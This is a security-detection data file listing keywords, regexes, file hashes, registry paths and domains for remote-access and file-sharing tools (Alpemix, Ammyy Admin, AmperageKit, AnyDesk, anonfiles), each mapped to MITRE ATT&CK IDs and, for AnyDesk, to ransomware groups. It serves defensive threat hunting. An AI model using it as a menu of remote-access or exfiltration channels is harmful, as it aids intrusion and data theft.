"*\CurrentControlSet\Services\AlpemixSrvcx*",".{0,1000}\\CurrentControlSet\\Services\\AlpemixSrvcx.{0,1000}","greyware_tool_keyword","Alpemix","connect to your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.alpemix.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*<Alpemix>*",".{0,1000}\<Alpemix\>.{0,1000}","greyware_tool_keyword","Alpemix","connect to your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.alpemix.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*<AlpemixWEB>*",".{0,1000}\<AlpemixWEB\>.{0,1000}","greyware_tool_keyword","Alpemix","connect to your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.alpemix.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*<Teknopars Bilisim>*",".{0,1000}\<Teknopars\sBilisim\>.{0,1000}","greyware_tool_keyword","Alpemix","connect to your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.alpemix.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*3660fe9f10b94d38fecaea009e6625850a46b1d47bb7788fc47f286c1008e2ec*",".{0,1000}3660fe9f10b94d38fecaea009e6625850a46b1d47bb7788fc47f286c1008e2ec.{0,1000}","greyware_tool_keyword","Alpemix","connect to your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.alpemix.com/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A"
"*6badff5495258b349559b9d2154ffcc7a435828dd57c4caf1c79f5d0ff9eb675*",".{0,1000}6badff5495258b349559b9d2154ffcc7a435828dd57c4caf1c79f5d0ff9eb675.{0,1000}","greyware_tool_keyword","Alpemix","connect to your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.alpemix.com/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A"
"*c5e68c5635bed872ce6ac0c2be5395cc15c2dbaa5f0052b86575cdd0b762902e*",".{0,1000}c5e68c5635bed872ce6ac0c2be5395cc15c2dbaa5f0052b86575cdd0b762902e.{0,1000}","greyware_tool_keyword","Alpemix","connect to your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.alpemix.com/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A"
"*serverinfo.alpemix.com*",".{0,1000}serverinfo\.alpemix\.com.{0,1000}","greyware_tool_keyword","Alpemix","connect to your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.alpemix.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\aa_nts.dll*",".{0,1000}\\aa_nts\.dll.{0,1000}","greyware_tool_keyword","Ammyy Admin","Ammyy Admin is a remote desktop software application abudsed by attackers","T1021 - T1219 - T1563 - T1608","TA0002 - TA0008 - TA0011 - TA0040","N/A","N/A","RMM","https://www.ammyy.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\AA_v3.exe*",".{0,1000}\\AA_v3\.exe.{0,1000}","greyware_tool_keyword","Ammyy Admin","Ammyy Admin is a remote desktop software application abudsed by attackers","T1021 - T1219 - T1563 - T1608","TA0002 - TA0008 - TA0011 - TA0040","N/A","N/A","RMM","https://www.ammyy.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\AA_v3.log*",".{0,1000}\\AA_v3\.log.{0,1000}","greyware_tool_keyword","Ammyy Admin","Ammyy Admin is a remote desktop software application abudsed by attackers","T1021 - T1219 - T1563 - T1608","TA0002 - TA0008 - TA0011 - TA0040","N/A","N/A","RMM","https://www.ammyy.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\AMMYY\access.log*",".{0,1000}\\AMMYY\\access\.log.{0,1000}","greyware_tool_keyword","Ammyy Admin","Ammyy Admin is a remote desktop software application abudsed by attackers","T1021 - T1219 - T1563 - T1608","TA0002 - TA0008 - TA0011 - TA0040","N/A","N/A","RMM","https://www.ammyy.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\ControlSet001\Control\SafeBoot\Network\AmmyyAdmin_*",".{0,1000}\\ControlSet001\\Control\\SafeBoot\\Network\\AmmyyAdmin_.{0,1000}","greyware_tool_keyword","Ammyy Admin","Ammyy Admin is a remote desktop software application abudsed by attackers","T1021 - T1219 - T1563 - T1608","TA0002 - TA0008 - TA0011 - TA0040","N/A","N/A","RMM","https://www.ammyy.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\ProgramData\AMMYY\*",".{0,1000}\\ProgramData\\AMMYY\\.{0,1000}","greyware_tool_keyword","Ammyy Admin","Ammyy Admin is a remote desktop software application abudsed by attackers","T1021 - T1219 - T1563 - T1608","TA0002 - TA0008 - TA0011 - TA0040","N/A","N/A","RMM","https://www.ammyy.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\SOFTWARE\Ammyy\Admin*",".{0,1000}\\SOFTWARE\\Ammyy\\Admin.{0,1000}","greyware_tool_keyword","Ammyy Admin","Ammyy Admin is a remote desktop software application abudsed by attackers","T1021 - T1219 - T1563 - T1608","TA0002 - TA0008 - TA0011 - TA0040","N/A","N/A","RMM","https://www.ammyy.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*AA_v3.exe* -elevated*",".{0,1000}AA_v3\.exe.{0,1000}\s\-elevated.{0,1000}","greyware_tool_keyword","Ammyy Admin","Ammyy Admin is a remote desktop software application abudsed by attackers","T1021 - T1219 - T1563 - T1608","TA0002 - TA0008 - TA0011 - TA0040","N/A","N/A","RMM","https://www.ammyy.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*AA_v3.exe* -service -lunch*",".{0,1000}AA_v3\.exe.{0,1000}\s\-service\s\-lunch.{0,1000}","greyware_tool_keyword","Ammyy Admin","Ammyy Admin is a remote desktop software application abudsed by attackers","T1021 - T1219 - T1563 - T1608","TA0002 - TA0008 - TA0011 - TA0040","N/A","N/A","RMM","https://www.ammyy.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Ammyy Admin*",".{0,1000}Ammyy\sAdmin.{0,1000}","greyware_tool_keyword","Ammyy Admin","Ammyy Admin is a remote desktop software application abudsed by attackers","T1021 - T1219 - T1563 - T1608","TA0002 - TA0008 - TA0011 - TA0040","N/A","N/A","RMM","https://www.ammyy.com","1","0","#companyname","N/A","10","10","N/A","N/A","N/A","N/A"
"*Ammyy LLC*",".{0,1000}Ammyy\sLLC.{0,1000}","greyware_tool_keyword","Ammyy Admin","Ammyy Admin is a remote desktop software application abudsed by attackers","T1021 - T1219 - T1563 - T1608","TA0002 - TA0008 - TA0011 - TA0040","N/A","N/A","RMM","https://www.ammyy.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*rl.ammyy.com/*",".{0,1000}rl\.ammyy\.com\/.{0,1000}","greyware_tool_keyword","Ammyy Admin","Ammyy Admin is a remote desktop software application abudsed by attackers","T1021 - T1219 - T1563 - T1608","TA0002 - TA0008 - TA0011 - TA0040","N/A","N/A","RMM","https://www.ammyy.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*SPR/Ammyy.R*",".{0,1000}SPR\/Ammyy\.R.{0,1000}","greyware_tool_keyword","Ammyy Admin","Ammyy Admin is a remote desktop software application abudsed by attackers","T1021 - T1219 - T1563 - T1608","TA0002 - TA0008 - TA0011 - TA0040","N/A","N/A","RMM","https://www.ammyy.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Win32.PUA.AmmyyAdmin*",".{0,1000}Win32\.PUA\.AmmyyAdmin.{0,1000}","greyware_tool_keyword","Ammyy Admin","Ammyy Admin is a remote desktop software application abudsed by attackers","T1021 - T1219 - T1563 - T1608","TA0002 - TA0008 - TA0011 - TA0040","N/A","N/A","RMM","https://www.ammyy.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*www.ammyy.com/files/v*",".{0,1000}www\.ammyy\.com\/files\/v.{0,1000}","greyware_tool_keyword","Ammyy Admin","Ammyy Admin is a remote desktop software application abudsed by attackers","T1021 - T1219 - T1563 - T1608","TA0002 - TA0008 - TA0011 - TA0040","N/A","N/A","RMM","https://www.ammyy.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/Amperage.exe*",".{0,1000}\/Amperage\.exe.{0,1000}","greyware_tool_keyword","AmperageKit","enabling Recall in Windows 11 version 24H2 on unsupported devices","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/thebookisclosed/AmperageKit","1","1","N/A","N/A","8","4","366","23","2024-06-21T16:37:12Z","2024-05-30T23:00:45Z"
"*/AmperageKit.git*",".{0,1000}\/AmperageKit\.git.{0,1000}","greyware_tool_keyword","AmperageKit","enabling Recall in Windows 11 version 24H2 on unsupported devices","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/thebookisclosed/AmperageKit","1","1","N/A","N/A","8","4","366","23","2024-06-21T16:37:12Z","2024-05-30T23:00:45Z"
"*/AmperageKit/releases/*",".{0,1000}\/AmperageKit\/releases\/.{0,1000}","greyware_tool_keyword","AmperageKit","enabling Recall in Windows 11 version 24H2 on unsupported devices","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/thebookisclosed/AmperageKit","1","1","N/A","N/A","8","4","366","23","2024-06-21T16:37:12Z","2024-05-30T23:00:45Z"
"*\Amperage.exe*",".{0,1000}\\Amperage\.exe.{0,1000}","greyware_tool_keyword","AmperageKit","enabling Recall in Windows 11 version 24H2 on unsupported devices","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/thebookisclosed/AmperageKit","1","0","N/A","N/A","8","4","366","23","2024-06-21T16:37:12Z","2024-05-30T23:00:45Z"
"*\Amperage\Program.cs*",".{0,1000}\\Amperage\\Program\.cs.{0,1000}","greyware_tool_keyword","AmperageKit","enabling Recall in Windows 11 version 24H2 on unsupported devices","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/thebookisclosed/AmperageKit","1","0","N/A","N/A","8","4","366","23","2024-06-21T16:37:12Z","2024-05-30T23:00:45Z"
"*\Amperage_v2024.5.31_arm64.zip*",".{0,1000}\\Amperage_v2024\.5\.31_arm64\.zip.{0,1000}","greyware_tool_keyword","AmperageKit","enabling Recall in Windows 11 version 24H2 on unsupported devices","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/thebookisclosed/AmperageKit","1","0","N/A","N/A","8","4","366","23","2024-06-21T16:37:12Z","2024-05-30T23:00:45Z"
"*\Amperage_v2024.6.1_arm64.zip*",".{0,1000}\\Amperage_v2024\.6\.1_arm64\.zip.{0,1000}","greyware_tool_keyword","AmperageKit","enabling Recall in Windows 11 version 24H2 on unsupported devices","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/thebookisclosed/AmperageKit","1","0","N/A","N/A","8","4","366","23","2024-06-21T16:37:12Z","2024-05-30T23:00:45Z"
"*\AmperageAIXSysRemove*",".{0,1000}\\AmperageAIXSysRemove.{0,1000}","greyware_tool_keyword","AmperageKit","enabling Recall in Windows 11 version 24H2 on unsupported devices","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/thebookisclosed/AmperageKit","1","0","N/A","N/A","8","4","366","23","2024-06-21T16:37:12Z","2024-05-30T23:00:45Z"
"*\AmperageHwReqDetour*",".{0,1000}\\AmperageHwReqDetour.{0,1000}","greyware_tool_keyword","AmperageKit","enabling Recall in Windows 11 version 24H2 on unsupported devices","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/thebookisclosed/AmperageKit","1","0","N/A","N/A","8","4","366","23","2024-06-21T16:37:12Z","2024-05-30T23:00:45Z"
"*\AmperageKit.sln*",".{0,1000}\\AmperageKit\.sln.{0,1000}","greyware_tool_keyword","AmperageKit","enabling Recall in Windows 11 version 24H2 on unsupported devices","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/thebookisclosed/AmperageKit","1","0","N/A","N/A","8","4","366","23","2024-06-21T16:37:12Z","2024-05-30T23:00:45Z"
"*\ProgramData\Amperage*",".{0,1000}\\ProgramData\\Amperage.{0,1000}","greyware_tool_keyword","AmperageKit","enabling Recall in Windows 11 version 24H2 on unsupported devices","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/thebookisclosed/AmperageKit","1","0","N/A","N/A","8","4","366","23","2024-06-21T16:37:12Z","2024-05-30T23:00:45Z"
"*327F3F26-182F-4E58-ABEA-A0CEDBCA0FCD*",".{0,1000}327F3F26\-182F\-4E58\-ABEA\-A0CEDBCA0FCD.{0,1000}","greyware_tool_keyword","AmperageKit","enabling Recall in Windows 11 version 24H2 on unsupported devices","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/thebookisclosed/AmperageKit","1","0","#GUIDproject","N/A","8","4","366","23","2024-06-21T16:37:12Z","2024-05-30T23:00:45Z"
"*3bdf7c5f0c87c94b461668137a3e7cbf757d59dafc7a063362c34d17f2f33e61*",".{0,1000}3bdf7c5f0c87c94b461668137a3e7cbf757d59dafc7a063362c34d17f2f33e61.{0,1000}","greyware_tool_keyword","AmperageKit","enabling Recall in Windows 11 version 24H2 on unsupported devices","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/thebookisclosed/AmperageKit","1","0","#filehash","N/A","8","4","366","23","2024-06-21T16:37:12Z","2024-05-30T23:00:45Z"
"*7334543f2f3555690c9a4995cf1d8e83beb9fa45e6aa147c49114a4ef89670b8*",".{0,1000}7334543f2f3555690c9a4995cf1d8e83beb9fa45e6aa147c49114a4ef89670b8.{0,1000}","greyware_tool_keyword","AmperageKit","enabling Recall in Windows 11 version 24H2 on unsupported devices","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/thebookisclosed/AmperageKit","1","0","#filehash","N/A","8","4","366","23","2024-06-21T16:37:12Z","2024-05-30T23:00:45Z"
"*75dce532b65a7c7644a626196a8af9d8370e163e802847505fb033a6290fb4a5*",".{0,1000}75dce532b65a7c7644a626196a8af9d8370e163e802847505fb033a6290fb4a5.{0,1000}","greyware_tool_keyword","AmperageKit","enabling Recall in Windows 11 version 24H2 on unsupported devices","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/thebookisclosed/AmperageKit","1","0","#filehash","N/A","8","4","366","23","2024-06-21T16:37:12Z","2024-05-30T23:00:45Z"
"*7931404e96b6aff52bc81a852f1f545f0cd07712d648099ec0618f4e66a1807f*",".{0,1000}7931404e96b6aff52bc81a852f1f545f0cd07712d648099ec0618f4e66a1807f.{0,1000}","greyware_tool_keyword","AmperageKit","enabling Recall in Windows 11 version 24H2 on unsupported devices","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/thebookisclosed/AmperageKit","1","0","#filehash","N/A","8","4","366","23","2024-06-21T16:37:12Z","2024-05-30T23:00:45Z"
"*80C7245C-B926-4CEB-BA5B-5353736137A8*",".{0,1000}80C7245C\-B926\-4CEB\-BA5B\-5353736137A8.{0,1000}","greyware_tool_keyword","AmperageKit","enabling Recall in Windows 11 version 24H2 on unsupported devices","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/thebookisclosed/AmperageKit","1","0","#GUIDproject","N/A","8","4","366","23","2024-06-21T16:37:12Z","2024-05-30T23:00:45Z"
"*8e454334de0de74a6e53ee1d26e24cd2b0f41427922d9e92e6d49cf5db942a3c*",".{0,1000}8e454334de0de74a6e53ee1d26e24cd2b0f41427922d9e92e6d49cf5db942a3c.{0,1000}","greyware_tool_keyword","AmperageKit","enabling Recall in Windows 11 version 24H2 on unsupported devices","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/thebookisclosed/AmperageKit","1","0","#filehash","N/A","8","4","366","23","2024-06-21T16:37:12Z","2024-05-30T23:00:45Z"
"*A3454AF1-12AF-4952-B26D-FF0930DB779E*",".{0,1000}A3454AF1\-12AF\-4952\-B26D\-FF0930DB779E.{0,1000}","greyware_tool_keyword","AmperageKit","enabling Recall in Windows 11 version 24H2 on unsupported devices","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/thebookisclosed/AmperageKit","1","0","#GUIDproject","N/A","8","4","366","23","2024-06-21T16:37:12Z","2024-05-30T23:00:45Z"
"*Amperage - Recall setup tool for unsupported hardware*",".{0,1000}Amperage\s\-\sRecall\ssetup\stool\sfor\sunsupported\shardware.{0,1000}","greyware_tool_keyword","AmperageKit","enabling Recall in Windows 11 version 24H2 on unsupported devices","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/thebookisclosed/AmperageKit","1","0","N/A","N/A","8","4","366","23","2024-06-21T16:37:12Z","2024-05-30T23:00:45Z"
"*cd1c54a8510c1e09d55868e12872aa54f9dc9ade95d70f08a173d29f6d676fde*",".{0,1000}cd1c54a8510c1e09d55868e12872aa54f9dc9ade95d70f08a173d29f6d676fde.{0,1000}","greyware_tool_keyword","AmperageKit","enabling Recall in Windows 11 version 24H2 on unsupported devices","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/thebookisclosed/AmperageKit","1","0","#filehash","N/A","8","4","366","23","2024-06-21T16:37:12Z","2024-05-30T23:00:45Z"
"*d84efd06178700a83d135862d6c7419dce2e12df92c78850dc7cc5b1da482abd*",".{0,1000}d84efd06178700a83d135862d6c7419dce2e12df92c78850dc7cc5b1da482abd.{0,1000}","greyware_tool_keyword","AmperageKit","enabling Recall in Windows 11 version 24H2 on unsupported devices","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/thebookisclosed/AmperageKit","1","0","#filehash","N/A","8","4","366","23","2024-06-21T16:37:12Z","2024-05-30T23:00:45Z"
"*ed0375afd9b26b18fd9b72bbb416dbf8bec289bf135facf4b7ba5cd2b1d86208*",".{0,1000}ed0375afd9b26b18fd9b72bbb416dbf8bec289bf135facf4b7ba5cd2b1d86208.{0,1000}","greyware_tool_keyword","AmperageKit","enabling Recall in Windows 11 version 24H2 on unsupported devices","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/thebookisclosed/AmperageKit","1","0","#filehash","N/A","8","4","366","23","2024-06-21T16:37:12Z","2024-05-30T23:00:45Z"
"*Removing AIX package from all standard users*",".{0,1000}Removing\sAIX\spackage\sfrom\sall\sstandard\susers.{0,1000}","greyware_tool_keyword","AmperageKit","enabling Recall in Windows 11 version 24H2 on unsupported devices","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/thebookisclosed/AmperageKit","1","0","N/A","N/A","8","4","366","23","2024-06-21T16:37:12Z","2024-05-30T23:00:45Z"
"*thebookisclosed/AmperageKit*",".{0,1000}thebookisclosed\/AmperageKit.{0,1000}","greyware_tool_keyword","AmperageKit","enabling Recall in Windows 11 version 24H2 on unsupported devices","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/thebookisclosed/AmperageKit","1","1","N/A","N/A","8","4","366","23","2024-06-21T16:37:12Z","2024-05-30T23:00:45Z"
"*https://anonfiles.com/*/*",".{0,1000}https\:\/\/anonfiles\.com\/.{0,1000}\/.{0,1000}","greyware_tool_keyword","anonfiles.com","Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims","T1567 - T1022 - T1074 - T1105","TA0011 - TA0009 - TA0010 - TA0008","N/A","N/A","Collection","https://twitter.com/mthcht/status/1660953897622544384","1","1","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*https://api.anonfiles.com/upload*",".{0,1000}https\:\/\/api\.anonfiles\.com\/upload.{0,1000}","greyware_tool_keyword","anonfiles.com","Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims","T1567 - T1022 - T1074 - T1105","TA0011 - TA0009 - TA0010 - TA0008","N/A","N/A","Data Exfiltration","https://twitter.com/mthcht/status/1660953897622544384","1","1","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*lklekjodgannjcccdlbicoamibgbdnmi*",".{0,1000}lklekjodgannjcccdlbicoamibgbdnmi.{0,1000}","greyware_tool_keyword","Anonymous Proxy Vpn Browser","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*/.anydesk/.anydesk.trace*",".{0,1000}\/\.anydesk\/\.anydesk\.trace.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona -  BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://www.cert.ssi.gouv.fr/alerte/CERTFR-2024-ALE-003/","1","0","N/A","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A"
"*/.anydesk/service.conf*",".{0,1000}\/\.anydesk\/service\.conf.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona -  BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://www.cert.ssi.gouv.fr/alerte/CERTFR-2024-ALE-003/","1","0","N/A","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A"
"*/.anydesk/system.conf*",".{0,1000}\/\.anydesk\/system\.conf.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona -  BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://www.cert.ssi.gouv.fr/alerte/CERTFR-2024-ALE-003/","1","0","N/A","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A"
"*/.anydesk/user.conf*",".{0,1000}\/\.anydesk\/user\.conf.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona -  BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://www.cert.ssi.gouv.fr/alerte/CERTFR-2024-ALE-003/","1","0","N/A","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A"
"*/Anydesk.exe",".{0,1000}\/Anydesk\.exe","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona -  BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://anydesk.com/","1","1","N/A","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A"
"*/Applications/Anydesk.app/*",".{0,1000}\/Applications\/Anydesk\.app\/.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona -  BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://www.cert.ssi.gouv.fr/alerte/CERTFR-2024-ALE-003/","1","0","N/A","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A"
"*/etc/systemd/system/anydesk.service*",".{0,1000}\/etc\/systemd\/system\/anydesk\.service.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona -  BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://www.cert.ssi.gouv.fr/alerte/CERTFR-2024-ALE-003/","1","0","N/A","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A"
"*/home/*/.anydesk/*",".{0,1000}\/home\/.{0,1000}\/\.anydesk\/.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona -  BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://www.cert.ssi.gouv.fr/alerte/CERTFR-2024-ALE-003/","1","0","N/A","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A"
"*/log/anydesk.trace*",".{0,1000}\/log\/anydesk\.trace.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona -  BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://www.cert.ssi.gouv.fr/alerte/CERTFR-2024-ALE-003/","1","0","N/A","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A"
"*/usr/bin/anydesk*",".{0,1000}\/usr\/bin\/anydesk.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona -  BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://www.cert.ssi.gouv.fr/alerte/CERTFR-2024-ALE-003/","1","0","N/A","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A"
"*/usr/lib64/anydesk*",".{0,1000}\/usr\/lib64\/anydesk.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona -  BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://www.cert.ssi.gouv.fr/alerte/CERTFR-2024-ALE-003/","1","0","N/A","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A"
"*/usr/libexec/anydesk*",".{0,1000}\/usr\/libexec\/anydesk.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona -  BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://www.cert.ssi.gouv.fr/alerte/CERTFR-2024-ALE-003/","1","0","N/A","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A"
